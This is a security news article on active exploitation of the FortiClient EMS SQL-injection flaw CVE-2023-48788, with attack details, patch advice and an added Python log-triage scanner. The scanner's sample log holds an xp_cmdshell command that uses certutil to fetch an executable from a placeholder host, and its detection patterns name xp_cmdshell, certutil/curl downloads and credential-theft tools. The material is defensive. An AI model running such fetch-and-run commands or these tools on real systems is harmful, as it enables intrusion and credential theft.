Hackers Actively Exploiting Vulnerability in FortiClient EMS

Cybersecurity researchers have identified active exploitation of a critical vulnerability (CVE-2023-48788) in Fortinet’s FortiClient Enterprise Management Server (EMS) software. This vulnerability arises from improperly filtered SQL queries, enabling attackers to execute unauthorized code or commands through SQL injection.

By exploiting this vulnerability, hackers can infiltrate enterprise networks and cause significant damage. Although patches have been released for this issue, attackers continue to exploit it globally.

The CVE-2023-48788 vulnerability affects the following versions of FortiClient EMS:

  • 7.0.1 through 7.0.10
  • 7.2.0 through 7.2.2

The vulnerability has been assigned a Common Vulnerability Scoring System (CVSS) score of 9.8, underscoring its severity. An unauthenticated attacker can exploit this issue by sending specially crafted data packets, leading to remote code execution (RCE).

The vulnerability was disclosed in March 2024, with patches released in versions 7.0.11 and 7.2.3. FortiClient EMS is commonly deployed as a centralized management platform that is reachable from the internet so that remote endpoints can connect to it. That exposure gives attackers an entry point for initial access, reconnaissance, and deployment of malicious payloads.

In October 2024, Kaspersky’s Global Emergency Response Team (GERT) identified an attack on a Windows server that leveraged this vulnerability in version 7.0.1 of FortiClient EMS.

The attackers gained system access via SQL injection and deployed remote control tools such as ScreenConnect and AnyDesk. They also used Mimikatz.exe to steal passwords and HRSword.exe to bypass security measures. Additional malicious payloads were downloaded with built-in Windows command-line utilities such as certutil and curl.

Evidence of the SQL injection was found in FortiClient EMS logs (ems.log, sql_trace.log) and in Microsoft SQL Server logs (ERRORLOG.X). The attackers used the xp_cmdshell extended stored procedure to execute unauthorized operating-system commands from the database.

Threat intelligence has revealed widespread exploitation of CVE-2023-48788 across various regions and industries. Attackers primarily target systems to steal data, harvest credentials, and distribute ransomware. Notably, the Medusa ransomware group has used this vulnerability for initial access.

FortiClient EMS users must immediately update to the following versions:

  • 7.0.11 or later
  • 7.2.3 or later

Additional security measures include:

  • Restricting direct internet access to FortiClient EMS servers.
  • Monitoring network traffic for signs of exploitation with an intrusion detection system (IDS).
  • Implementing endpoint protection platforms (EPP) on all devices.
  • Configuring web application firewalls (WAF) to block malicious requests.
  • Regularly reviewing system logs to detect suspicious activity.
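The log evidence described earlier (xp_cmdshell appearing in sql_trace.log and the SQL Server ERRORLOG, follow-on downloads through certutil or curl, and the named post-exploitation tools) can be turned into a simple triage scan for the log review recommended above. The following is an added example, not code from this article or from Fortinet or Kaspersky; the sample log lines are constructed for illustration, and the real ems.log, sql_trace.log and ERRORLOG layouts differ, so the patterns match on message content rather than on line layout.

```python
import re
from dataclasses import dataclass

# Constructed sample lines (assumption: real FortiClient EMS / SQL Server log
# layouts differ; only the message fragments matter to the rules below).
SAMPLE_LOG = "\n".join([
    r"2024-10-02 11:14:03 [ems] query: SELECT name FROM devices WHERE id = 42",
    r"2024-10-02 11:14:09 [sql_trace] exec sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
    r"2024-10-02 11:14:10 [sql_trace] EXEC xp_cmdshell 'certutil -urlcache -split -f http://example.invalid/a.exe C:\ProgramData\a.exe'",
    r"2024-10-02 11:14:22 [sql_trace] EXEC xp_cmdshell 'C:\ProgramData\HRSword.exe'",
    r"2024-10-02 11:15:01 [ems] query: SELECT count(*) FROM policies",
    r"2024-10-02 11:15:40 [errorlog] Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
])

# Detection rules: (name, severity, pattern). A legitimate EMS deployment has no
# reason to enable or call xp_cmdshell, so any hit on an EMS host is worth triage.
RULES = [
    ("xp_cmdshell-enabled", "high",
     re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b|option 'xp_cmdshell' changed from 0 to 1", re.I)),
    ("xp_cmdshell-exec", "high",
     re.compile(r"\bexec(ute)?\s+(master\.(dbo\.|\.))?xp_cmdshell\b", re.I)),
    ("lolbin-download", "critical",            # certutil/curl fetching a remote file
     re.compile(r"\b(certutil|curl)(\.exe)?\b.*?(https?://|-urlcache)", re.I)),
    ("post-exploitation-tool", "critical",     # tools named in the incident write-up
     re.compile(r"mimikatz|hrsword|screenconnect|anydesk", re.I)),
]


@dataclass
class Finding:
    line_no: int
    rule: str
    severity: str
    line: str


def scan_log(text: str) -> list[Finding]:
    """Return one Finding per (line, rule) hit, in line order, then rule order."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for rule, severity, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(line_no, rule, severity, line.strip()))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Hit count per rule; feeds a dashboard or alert threshold."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no} [{f.severity}] {f.rule}: {f.line}")
    print(summarize(scan_log(SAMPLE_LOG)))
```

On a real host, point `scan_log` at the contents of sql_trace.log and the ERRORLOG files in turn; the xp_cmdshell-enabled rule in particular fires on the standard SQL Server configuration-change message even when the SQL text itself was not logged.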

The exploitation of CVE-2023-48788 highlights the critical importance of applying updates promptly and implementing robust security measures. Organizations must regularly apply patches and adopt best practices to secure their infrastructure and strengthen their security posture.
